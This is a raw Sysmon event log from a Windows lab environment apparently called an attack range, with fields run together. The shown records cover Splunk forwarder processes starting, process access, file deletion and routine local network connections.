11:17:01.542{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-17AD-6216-3007-000000003802}5608C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297566Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:01.542{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-17AD-6216-3007-000000003802}5608C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297565Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:01.542{C8EA50B7-17AD-6216-3007-000000003802}5608C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297564Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:01.388{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC23DFA08E38D7432E7E9E493FFEF412,SHA256=50B8E91F71812265FD5E81A92DB08F25C3054485B26B3C1400C8CDD3A0F86F2B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297563Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:58.671{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49459-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000221455Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:02.576{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=680FB91D87BA0CFA49CC9181181058BD,SHA256=E06B1C511CE48AD067A57306A1A0BA6631E98243AFE190BE2BD8310856D212F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297582Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:02.680{C8EA50B7-17AE-6216-3107-000000003802}9682280C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297581Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:02.412{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-17AE-6216-3107-000000003802}968C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297580Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:02.396{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=819FF95C213860ED9036056EFBE79909,SHA256=34FEC81713C1B7902ED2EAB542950B356CEC019EF2F6579ED2B2EAB1D248274B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297579Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:02.396{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297578Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:02.396{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297577Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:02.396{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-17AE-6216-3107-000000003802}968C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297576Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:02.396{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297575Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:02.396{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297574Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:02.396{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-17AE-6216-3107-000000003802}968C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297573Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:02.398{C8EA50B7-17AE-6216-3107-000000003802}968C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221457Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:03.638{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A654CB6D08F249B9A3F7048CF8841223,SHA256=78028F0B38FFB52A6E5C8F2B6E195E99779F3CAA70EDDF6C59C36E9638AC45D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297591Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:03.754{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-17AF-6216-3207-000000003802}6100C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297590Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:03.754{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297589Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:03.754{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297588Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:03.754{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297587Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:03.754{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297586Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:03.754{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-17AF-6216-3207-000000003802}6100C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297585Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:03.754{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-17AF-6216-3207-000000003802}6100C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297584Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:03.756{C8EA50B7-17AF-6216-3207-000000003802}6100C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297583Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:03.417{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A029084C429A346EEF953A7BA67BC3D6,SHA256=4C86DA430C5CCC8D69208B4BBF011343C0C0666943F1FBBF8352DE4402A82D84,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221456Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:01.625{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51650-false10.0.1.12-8000- 23542300x8000000000000000221458Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:04.888{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63638078A9A1C05E9AD051B04D141937,SHA256=B9B93ED358BF3D206891D2A2296E9C6852E728F5FE439D75FA44C76B9185BD71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297592Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:04.428{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AA7FDDC5746AFC5D350137F81B14042,SHA256=46598B54BEAFD2C803DA20076C2108307B5DF7B6A144DD05784D6D23854E7000,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221459Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:05.919{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67E3F72E38FB551AD2030B48EC9F8C1C,SHA256=6393B4D48F1D45832B02769460866A22DDAE4D62B16D3BF6E208F8AD84E222BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297593Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:05.441{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CDDD3C2BF78F01DF34B937B4D09FCD3,SHA256=E42C72378287B40B3D1FEB6FBF39C2C9E4A20C173E9810E3E5DE6AB8B25BD6F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297597Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:06.463{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE6D06BE057D87DC3F64FE50FA11BC9A,SHA256=CAC4CE3390253592A975593859E52CE650588D79F8405F227B5DF9A123D7615C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297596Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:03.705{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49461-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000297595Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:03.475{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49460-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000297594Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:03.475{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49460-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000297598Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 